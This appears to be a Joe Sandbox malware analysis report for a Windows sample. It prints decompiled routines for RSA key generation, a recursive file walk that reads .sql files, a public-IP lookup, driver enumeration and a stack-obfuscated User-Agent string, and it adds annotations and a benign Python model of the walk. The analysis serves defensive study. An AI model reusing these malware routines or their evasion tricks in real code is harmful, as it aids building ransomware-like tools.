                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 72144047-1948191093
                                        • Opcode ID: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction ID: b93ff390acc2f02cb71f1f880095a8752a233601122ff60c9f66d648c7cb098d
                                        • Opcode Fuzzy Hash: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction Fuzzy Hash: 52314F75A44309BFEB20CFA0DD45FEE77B8AB49701F608548F601AA1C1DB79A660CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0F9D62B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				long* _v8;
                                        				long* _v12;
                                        				int _v16;
                                        				long** _t15;
                                        				long* _t16;
                                        				long _t23;
                                        
                                        				_t15 =  &_v8;
                                        				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                        				if(_t15 != 0) {
                                        					L6:
                                        					_t16 = _v8;
                                        					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
                                        					if(_t16 == 0) {
                                        					}
                                        					_v16 = 0;
                                        					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                        					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
                                        					CryptDestroyKey(_v12);
                                        					CryptReleaseContext(_v8, 0);
                                        					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
                                        					return 1;
                                        				}
                                        				_t23 = GetLastError();
                                        				if(_t23 != 0x80090016) {
                                        					return 0;
                                        				}
                                        				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                        				if(_t23 != 0) {
                                        					goto L6;
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0F9D49C6,?,0F9D49CE), ref: 0F9D62C5
                                        • GetLastError.KERNEL32(?,0F9D49CE), ref: 0F9D62CF
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D49CE), ref: 0F9D62EB
                                        • CryptGenKey.ADVAPI32(0F9D49CE,0000A400,08000001,?,?,0F9D49CE), ref: 0F9D6317
                                        • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F9D633B
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F9D6353
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0F9D635D
                                        • CryptReleaseContext.ADVAPI32(0F9D49CE,00000000), ref: 0F9D6369
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F9D637E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 137402220-1948191093
                                        • Opcode ID: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction ID: 1f5514a9c9bdc8d3f6e7b4d77255958fbdba67b62d9a96974f9b763613daa586
                                        • Opcode Fuzzy Hash: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction Fuzzy Hash: F6219F75784309BBEB20CFA0DD4AFDE777DAB59B12F208504F701EA1C1C6B9A5609B60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0F9D6EAF
                                        • lstrlenW.KERNEL32(0F9DFF0C), ref: 0F9D6EBC
                                          • Part of subcall function 0F9D7EF0: InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                          • Part of subcall function 0F9D7EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6EEB
                                        • wsprintfW.USER32 ref: 0F9D6F03
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6F19
                                        • InternetCloseHandle.WININET(?), ref: 0F9D6F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                        • String ID: GET$ipv4bot.whatismyipaddress.com
                                        • API String ID: 4289327240-2259699238
                                        • Opcode ID: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction ID: 5f71e2370dd9b9bb2034459d66c42b2ab8eff49ec4b75280de9756b4624c85b0
                                        • Opcode Fuzzy Hash: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction Fuzzy Hash: 4B01F93174520437EB206A6A9D4EF9B3E2CEBC6B51F308020FA05E10C3DE685165C6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D6C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                        				void* _v12;
                                        				intOrPtr _v16;
                                        				WCHAR* _v20;
                                        				intOrPtr _v24;
                                        				struct _WIN32_FIND_DATAW _v616;
                                        				void* _t35;
                                        				signed int _t37;
                                        				int _t39;
                                        				signed int _t42;
                                        				void* _t46;
                                        				signed int* _t48;
                                        				WCHAR* _t53;
                                        				intOrPtr* _t54;
                                        				short _t57;
                                        				WCHAR* _t63;
                                        				void* _t67;
                                        
                                        				_v24 = __edx;
                                        				_t63 = __ecx;
                                        				"SVWj@h"();
                                        				if(__eax == 0 || E0F9D6A40(__ecx) != 0) {
                                        					L17:
                                        					__eflags = 0;
                                        					return 0;
                                        				} else {
                                        					E0F9D6BE0(__ecx);
                                        					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                        					_v20 = _t53;
                                        					lstrcatW(_t63, "*");
                                        					_t35 = FindFirstFileW(_t63,  &_v616);
                                        					_t57 = 0;
                                        					_v12 = _t35;
                                        					 *_t53 = 0;
                                        					if(_t35 != 0xffffffff) {
                                        						_t54 = _a12;
                                        						do {
                                        							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                        							__eflags = _t37;
                                        							if(_t37 != 0) {
                                        								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                        								__eflags = _t42;
                                        								if(_t42 != 0) {
                                        									lstrcatW(_t63,  &(_v616.cFileName));
                                        									__eflags = _v616.dwFileAttributes & 0x00000010;
                                        									if(__eflags == 0) {
                                        										_v16 =  *_t54;
                                        										_t46 = E0F9D6950(_t63,  &_v616, __eflags, _t57, _a4);
                                        										_t67 = _t67 + 8;
                                        										 *_t54 =  *_t54 + _t46;
                                        										asm("adc [ebx+0x4], edx");
                                        										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                        										if(__eflags <= 0) {
                                        											if(__eflags < 0) {
                                        												L12:
                                        												_t48 = _a8;
                                        												 *_t48 =  *_t48 + 1;
                                        												__eflags =  *_t48;
                                        											} else {
                                        												__eflags = _v16 -  *_t54;
                                        												if(_v16 <  *_t54) {
                                        													goto L12;
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										E0F9D6C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                        										_t67 = _t67 + 0xc;
                                        									}
                                        									_t57 = 0;
                                        									__eflags = 0;
                                        									 *_v20 = 0;
                                        								}
                                        							}
                                        							_t39 = FindNextFileW(_v12,  &_v616);
                                        							__eflags = _t39;
                                        						} while (_t39 != 0);
                                        						FindClose(_v12);
                                        						goto L17;
                                        					} else {
                                        						return 0xdeadbeaf;
                                        					}
                                        				}
                                        			}
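The listing above is a recursive directory walk: FindFirstFileW on `path\*`, skip `.` and `..`, recurse into anything carrying FILE_ATTRIBUTE_DIRECTORY (0x10) with a `\` appended, and hand every other entry to E0F9D6950, whose return value is added into a 64-bit total with an add/adc pair before a per-file counter is bumped. The following Python model is an added illustration, not code from the sample or from Joe Sandbox. It assumes that E0F9D6950 returns a byte count (the listing only shows the value being added in edx:eax), replaces that routine with a stand-in that returns the file size, and runs on a constructed temporary tree so the counters can be checked offline:

```python
import os
import tempfile

MASK32 = 0xFFFFFFFF


def per_file_routine(path):
    """Stand-in for E0F9D6950 (hypothetical: the listing only shows its
    return value being added to a 64-bit total in edx:eax, so this stand-in
    returns the file size to make the accumulator observable)."""
    return os.path.getsize(path)


def add64(acc, value):
    """The add/adc pair from the listing: a 64-bit total kept as two 32-bit
    halves, the carry out of the low half folded into the high half."""
    lo = acc["lo"] + (value & MASK32)
    acc["hi"] = (acc["hi"] + (value >> 32) + (lo >> 32)) & MASK32
    acc["lo"] = lo & MASK32


def walk_like_e0f9d6c90(root, acc=None):
    """Model of the loop in E0F9D6C90.

    FindFirstFileW(root + "*") / FindNextFileW become os.scandir; "." and
    ".." are skipped as the two lstrcmpW calls do; an entry with
    FILE_ATTRIBUTE_DIRECTORY (0x10) recurses with "\\" appended; anything
    else goes to the per-file routine. The listing saves the low half of the
    total before the add and bumps *_a8 when the 64-bit total grew, so
    "count" ends up as the number of files for which the routine returned a
    nonzero value.
    """
    if acc is None:
        acc = {"lo": 0, "hi": 0, "count": 0}
    with os.scandir(root) as it:
        entries = sorted(it, key=lambda e: e.name)  # fixed order for the demo
    for entry in entries:
        if entry.name in (".", ".."):
            continue
        if entry.is_dir(follow_symlinks=False):
            walk_like_e0f9d6c90(entry.path, acc)
            continue
        before = (acc["hi"], acc["lo"])
        add64(acc, per_file_routine(entry.path))
        if (acc["hi"], acc["lo"]) > before:
            acc["count"] += 1
    return acc


def demo_tree():
    """Constructed input: a throwaway tree with two non-empty files, one
    empty file and a nested directory, so the result can be checked."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "sub", "deeper"))
        with open(os.path.join(root, "a.txt"), "wb") as f:
            f.write(b"A" * 100)
        with open(os.path.join(root, "sub", "b.sql"), "wb") as f:
            f.write(b"B" * 4000)
        open(os.path.join(root, "sub", "deeper", "empty.bin"), "wb").close()
        return walk_like_e0f9d6c90(root)


if __name__ == "__main__":
    print(demo_tree())  # {'lo': 4100, 'hi': 0, 'count': 2}
```

The comparison that gates the counter is garbled by the decompiler (both operands print as `*(_t54 + 4)`), so the "total grew" reading is the interpretation that fits the surrounding add/adc and the saved `_v16`; treat it as a reading of the listing, not a fact the report states. Note also that the subcall E0F9D6640 in the API list resolves CSIDL 0x2A (Program Files x86), 0x2B (Common Files), 0x24 (Windows) and 0x1C (Local AppData) before the walk starts, which is worth checking against the sample's exclusion logic when triaging what it touches.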
                                        0x0f9d6c9c
                                        0x0f9d6c9f
                                        0x0f9d6ca1
                                        0x0f9d6ca8
                                        0x0f9d6dd6
                                        0x0f9d6dd6
                                        0x0f9d6ddc
                                        0x0f9d6cbd
                                        0x0f9d6cbd
                                        0x0f9d6cd5
                                        0x0f9d6cd8
                                        0x0f9d6cdb
                                        0x0f9d6ce5
                                        0x0f9d6ceb
                                        0x0f9d6ced
                                        0x0f9d6cf0
                                        0x0f9d6cf6
                                        0x0f9d6d04
                                        0x0f9d6d10
                                        0x0f9d6d1c
                                        0x0f9d6d22
                                        0x0f9d6d24
                                        0x0f9d6d36
                                        0x0f9d6d3c
                                        0x0f9d6d3e
                                        0x0f9d6d48
                                        0x0f9d6d4a
                                        0x0f9d6d51
                                        0x0f9d6d82
                                        0x0f9d6d85
                                        0x0f9d6d8a
                                        0x0f9d6d8d
                                        0x0f9d6d8f
                                        0x0f9d6d92
                                        0x0f9d6d95
                                        0x0f9d6d97
                                        0x0f9d6da0
                                        0x0f9d6da0
                                        0x0f9d6da3
                                        0x0f9d6da3
                                        0x0f9d6d99
                                        0x0f9d6d9c
                                        0x0f9d6d9e
                                        0x00000000
                                        0x00000000
                                        0x0f9d6d9e
                                        0x0f9d6d97
                                        0x0f9d6d53
                                        0x0f9d6d67
                                        0x0f9d6d6c
                                        0x0f9d6d6c
                                        0x0f9d6dae
                                        0x0f9d6dae
                                        0x0f9d6db0
                                        0x0f9d6db0
                                        0x0f9d6d3e
                                        0x0f9d6dbd
                                        0x0f9d6dc3
                                        0x0f9d6dc3
                                        0x0f9d6dce
                                        0x00000000
                                        0x0f9d6cf8
                                        0x0f9d6d03
                                        0x0f9d6d03
                                        0x0f9d6cf6

                                        APIs
                                          • Part of subcall function 0F9D6640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                          • Part of subcall function 0F9D6640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                          • Part of subcall function 0F9D6A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                          • Part of subcall function 0F9D6A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                          • Part of subcall function 0F9D6A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                          • Part of subcall function 0F9D6A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                          • Part of subcall function 0F9D6A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                          • Part of subcall function 0F9D6BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                          • Part of subcall function 0F9D6BE0: wsprintfW.USER32 ref: 0F9D6C03
                                          • Part of subcall function 0F9D6BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                          • Part of subcall function 0F9D6BE0: GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                          • Part of subcall function 0F9D6BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                        • String ID:
                                        • API String ID: 1112924665-0
                                        • Opcode ID: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction ID: 32feab062f61293210968fe358081b6120d426da6fd40f9b3eb50eeadd85a6f7
                                        • Opcode Fuzzy Hash: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction Fuzzy Hash: A131D531A04219ABDF10AF64EC84AAD77BCEF85310F24C1A6F905E7183DB34AA54DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0F9D2F50(WCHAR* __ecx) {
                                        				unsigned int _v8;
                                        				char _v12;
                                        				WCHAR* _v16;
                                        				short _v2064;
                                        				long _t17;
                                        				void* _t18;
                                        				WCHAR* _t23;
                                        				unsigned int _t31;
                                        				void* _t35;
                                        				intOrPtr* _t39;
                                        				signed int _t40;
                                        
                                        				_t39 = __imp__EnumDeviceDrivers;
                                        				_v16 = __ecx;
                                        				_v8 = 0;
                                        				 *_t39( &_v12, 4,  &_v8);
                                        				_t17 = _v8;
                                        				if(_t17 != 0) {
                                        					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
                                        					_t35 = _t18;
                                        					if(_t35 != 0) {
                                        						_push( &_v12);
                                        						_push(_v8);
                                        						_push(_t35);
                                        						if( *_t39() == 0) {
                                        							L10:
                                        							VirtualFree(_t35, 0, 0x8000);
                                        							return 0;
                                        						} else {
                                        							_t40 = 0;
                                        							_t31 = _v8 >> 2;
                                        							if(_t31 <= 0) {
                                        								goto L10;
                                        							} else {
                                        								while(1) {
                                        									_t23 =  &_v2064;
                                        									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
                                        									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
                                        										break;
                                        									}
                                        									_t40 = _t40 + 1;
                                        									if(_t40 < _t31) {
                                        										continue;
                                        									} else {
                                        										goto L10;
                                        									}
                                        									goto L12;
                                        								}
                                        								VirtualFree(_t35, 0, 0x8000);
                                        								return 1;
                                        							}
                                        						}
                                        					} else {
                                        						return _t18;
                                        					}
                                        				} else {
                                        					return _t17;
                                        				}
                                        				L12:
                                        			}
                                        0x0f9d2f5a
                                        0x0f9d2f69
                                        0x0f9d2f6d
                                        0x0f9d2f74
                                        0x0f9d2f76
                                        0x0f9d2f7b
                                        0x0f9d2f8d
                                        0x0f9d2f93
                                        0x0f9d2f97
                                        0x0f9d2fa3
                                        0x0f9d2fa4
                                        0x0f9d2fa7
                                        0x0f9d2fac
                                        0x0f9d2ff2
                                        0x0f9d2ffa
                                        0x0f9d3008
                                        0x0f9d2fae
                                        0x0f9d2fb1
                                        0x0f9d2fb3
                                        0x0f9d2fb8
                                        0x00000000
                                        0x0f9d2fc0
                                        0x0f9d2fc0
                                        0x0f9d2fc5
                                        0x0f9d2fcf
                                        0x0f9d2fd7
                                        0x00000000
                                        0x00000000
                                        0x0f9d2fed
                                        0x0f9d2ff0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2ff0
                                        0x0f9d3011
                                        0x0f9d3022
                                        0x0f9d3022
                                        0x0f9d2fb8
                                        0x0f9d2f99
                                        0x0f9d2f9e
                                        0x0f9d2f9e
                                        0x0f9d2f81
                                        0x0f9d2f81
                                        0x0f9d2f81
                                        0x00000000

                                        APIs
                                        • EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDeviceDriversEnumVirtual
                                        • String ID:
                                        • API String ID: 4140748134-0
                                        • Opcode ID: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction ID: 4c7de329cb28a127589ff01d55f5ce91161f909f0c02abca8b437967b4d48f0d
                                        • Opcode Fuzzy Hash: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction Fuzzy Hash: 73212932A04219BBEB208F9CDD81FEDB7BCEB44711F2041A6FE04D6181D774A9259BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph (legend: Executed / Not Executed)
                                        • Block 225: f9d7ce0-f9d7ecb InternetOpenW
                                        • Block 226: f9d7ecd-f9d7edf InternetOpenW
                                        • Block 227: f9d7ee2-f9d7ee8
                                        • Edges: 225->226, 225->227, 226->227
                                        C-Code - Quality: 100%
                                        			E0F9D7CE0(void* __ecx) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				intOrPtr _v140;
                                        				intOrPtr _v144;
                                        				intOrPtr _v148;
                                        				intOrPtr _v152;
                                        				intOrPtr _v156;
                                        				intOrPtr _v160;
                                        				intOrPtr _v164;
                                        				intOrPtr _v168;
                                        				intOrPtr _v172;
                                        				intOrPtr _v176;
                                        				intOrPtr _v180;
                                        				intOrPtr _v184;
                                        				intOrPtr _v188;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				intOrPtr _v200;
                                        				intOrPtr _v204;
                                        				intOrPtr _v208;
                                        				intOrPtr _v212;
                                        				intOrPtr _v216;
                                        				intOrPtr _v220;
                                        				short _v224;
                                        				WCHAR* _t62;
                                        				void* _t64;
                                        
                                        				_v8 = 0;
                                        				_v224 = 0x6f004d;
                                        				_v220 = 0x69007a;
                                        				_v216 = 0x6c006c;
                                        				_v212 = 0x2f0061;
                                        				_v208 = 0x2e0035;
                                        				_v204 = 0x200030;
                                        				_v200 = 0x570028;
                                        				_v196 = 0x6e0069;
                                        				_v192 = 0x6f0064;
                                        				_v188 = 0x730077;
                                        				_v184 = 0x4e0020;
                                        				_v180 = 0x200054;
                                        				_v176 = 0x2e0036;
                                        				_v172 = 0x3b0031;
                                        				_v168 = 0x570020;
                                        				// Stack-built UTF-16 string: two characters per DWORD, low word first,
                                        				// so no plain-text string survives in the file for AV signatures.
                                        				// The slots visible in this excerpt decode to the tail of a browser User-Agent:
                                        				//   "OW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
                                        				// The string begins above this excerpt at &_v224, which is what reaches InternetOpenW.
                                        				_v164 = 0x57004f;   // "OW"
                                        				_v160 = 0x340036;   // "64"
                                        				_v156 = 0x200029;   // ") "
                                        				_v152 = 0x700041;   // "Ap"
                                        				_v148 = 0x6c0070;   // "pl"
                                        				_v144 = 0x570065;   // "eW"
                                        				_v140 = 0x620065;   // "eb"
                                        				_v136 = 0x69004b;   // "Ki"
                                        				_v132 = 0x2f0074;   // "t/"
                                        				_v128 = 0x330035;   // "53"
                                        				_v124 = 0x2e0037;   // "7."
                                        				_v120 = 0x360033;   // "36"
                                        				_v116 = 0x280020;   // " ("
                                        				_v112 = 0x48004b;   // "KH"
                                        				_v108 = 0x4d0054;   // "TM"
                                        				_v104 = 0x2c004c;   // "L,"
                                        				_v100 = 0x6c0020;   // " l"
                                        				_v96 = 0x6b0069;    // "ik"
                                        				_v92 = 0x200065;    // "e "
                                        				_v88 = 0x650047;    // "Ge"
                                        				_v84 = 0x6b0063;    // "ck"
                                        				_v80 = 0x29006f;    // "o)"
                                        				_v76 = 0x430020;    // " C"
                                        				_v72 = 0x720068;    // "hr"
                                        				_v68 = 0x6d006f;    // "om"
                                        				_v64 = 0x2f0065;    // "e/"
                                        				_v60 = 0x350035;    // "55"
                                        				_v56 = 0x30002e;    // ".0"
                                        				_v52 = 0x32002e;    // ".2"
                                        				_v48 = 0x380038;    // "88"
                                        				_v44 = 0x2e0033;    // "3."
                                        				_v40 = 0x370038;    // "87"
                                        				_v36 = 0x530020;    // " S"
                                        				_v32 = 0x660061;    // "af"
                                        				_v28 = 0x720061;    // "ar"
                                        				_v24 = 0x2f0069;    // "i/"
                                        				_v20 = 0x330035;    // "53"
                                        				_v16 = 0x2e0037;    // "7."
                                        				_v12 = 0x360033;    // "36"
                                        				// First attempt: INTERNET_OPEN_TYPE_PRECONFIG (0), no proxy, no flags.
                                        				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
